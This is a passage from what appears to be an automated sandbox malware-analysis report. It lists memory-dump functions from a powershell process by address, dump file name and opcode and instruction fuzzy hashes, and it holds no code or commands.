                                                                                                                    • Opcode ID: 64a9fb5b5a65bfbae9e9d673b43f4638aacba3618b23506c60f305ec1cb74564
                                                                                                                    • Instruction ID: 56596905675d63f79a77ce5551e17e52fb3ef92abb09510a5586f31aa5f88f20
                                                                                                                    • Opcode Fuzzy Hash: 64a9fb5b5a65bfbae9e9d673b43f4638aacba3618b23506c60f305ec1cb74564
                                                                                                                    • Instruction Fuzzy Hash: 2341283140EFC45FE7569B2898659523FF0EF57320B1A05DFD488CB1A3D629A84AC7A2
                                                                                                                    Function 00007FFD9BAAA10C Relevance: .1, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2800487628.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8d021894cd4ee0a23c6a9054e253ef4c2fdf65dae0ef1b58522d4bb2d38633c2
                                                                                                                    • Instruction ID: 43dc8fe314f7ca1d747ed69233720408bebdf32a1112f291af2bd4d377c622ee
                                                                                                                    • Opcode Fuzzy Hash: 8d021894cd4ee0a23c6a9054e253ef4c2fdf65dae0ef1b58522d4bb2d38633c2
                                                                                                                    • Instruction Fuzzy Hash: C131953191CA4C9FDB189B5CD846AA97BE0FB99721F00422FE449D3251DB70A856CBC2
                                                                                                                    Function 00007FFD9BAAB028 Relevance: .1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2800487628.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8af27995630675aa0ae13e01cbca790b4afb4e3634e39a65cebcb3229e4f0e9a
                                                                                                                    • Instruction ID: c607dda6be3657c7c48f7ccb3d93031a0025cb5d5e6b511ee9e58027aaee1280
                                                                                                                    • Opcode Fuzzy Hash: 8af27995630675aa0ae13e01cbca790b4afb4e3634e39a65cebcb3229e4f0e9a
                                                                                                                    • Instruction Fuzzy Hash: BA21073190CB4C4FDB58DFACD84A7E9BBE1EB96321F04426BD448D3192DA74A416CB91
                                                                                                                    Function 00007FFD9BAA4675 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2800487628.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                    • Instruction ID: 2e91e71cc2b44e39cb8f7cd722c398ee3008c0f16b60a0073bc18851048dd9ec
                                                                                                                    • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                    • Instruction Fuzzy Hash: 8D01847120CB0C8FD748EF0CE051AA5B3E0FB85360F10056EE58AC36A1DA32E881CB45
                                                                                                                    Function 00007FFD9BAAAE68 Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2800487628.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9640db8af87f467f2c1612031fb2170497b91fd7fe6d921295cd425484d0c8bd
                                                                                                                    • Instruction ID: 94d39a2108ff2cbeac65aa26d9cf6e8a82deec17dc557388c334c7a133e9a4ac
                                                                                                                    • Opcode Fuzzy Hash: 9640db8af87f467f2c1612031fb2170497b91fd7fe6d921295cd425484d0c8bd
                                                                                                                    • Instruction Fuzzy Hash: 75F02431808A8D8FDB16DF68C8255E57FE0FF26210F05029BE458C70B2DB74A558CB92
                                                                                                                    Function 00007FFD9BB74A1D Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2809833119.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 348a9b741f55bb16e58422d6b43233062149bf4b6b06e3e898257ef9212f0b03
                                                                                                                    • Instruction ID: 94ae361031c27dc89f2608c3dd1aaf60368a7be4bb1d13bc78b4cfcd68574b3c
                                                                                                                    • Opcode Fuzzy Hash: 348a9b741f55bb16e58422d6b43233062149bf4b6b06e3e898257ef9212f0b03
                                                                                                                    • Instruction Fuzzy Hash: 49F0BE32B0E5498FD768EA4CE4918A873E0FF4532571100BAE26DC74B3CA26EC40CB44
                                                                                                                    Function 00007FFD9BB74CD0 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2809833119.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 713d0a1262634a36407cd6811daa39fd5eca99abcc1309082022f72d0c0a681f
                                                                                                                    • Instruction ID: 5d31f9f8bde956fca6e7c5f216e3f9c23f5bc05d4c5b0db704954ffad7b3c940
                                                                                                                    • Opcode Fuzzy Hash: 713d0a1262634a36407cd6811daa39fd5eca99abcc1309082022f72d0c0a681f
                                                                                                                    • Instruction Fuzzy Hash: D5F05E32A0E5498FE768EA5CE4958A877E0FF4532571500BAE25DCB4B3DA26AC50CB50
                                                                                                                    Function 00007FFD9BB753E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2809833119.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 90bd454a6d335b040b9f3e36ac7fecf5cdd0327bc19ba6fcc715715d3691a465
                                                                                                                    • Instruction ID: 79e80f509c503997305415167631575cce0e7771d3d4148788e580149657b2ee
                                                                                                                    • Opcode Fuzzy Hash: 90bd454a6d335b040b9f3e36ac7fecf5cdd0327bc19ba6fcc715715d3691a465
                                                                                                                    • Instruction Fuzzy Hash: 4AF0A73131CF044FD744EE1DD4457A1B3D0FBA8314F10452FE449C3251DA21E4818782